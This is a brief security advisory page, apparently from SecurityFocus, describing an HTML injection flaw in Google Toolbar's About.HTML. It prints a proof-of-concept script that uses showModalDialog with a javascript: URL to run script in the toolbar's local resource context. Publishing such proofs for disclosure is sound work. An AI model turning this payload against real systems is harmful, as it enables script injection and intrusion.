Google Toolbar About.HTML HTML Injection Vulnerability

The following proof of concept is available:

<s c r i p t>
window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dll/ABOUT.HTML",
"<div style=\"background-image:
url(javascript:alert(location.href));\">");
</s c r i p t>


 

Privacy Statement
Copyright 2010, SecurityFocus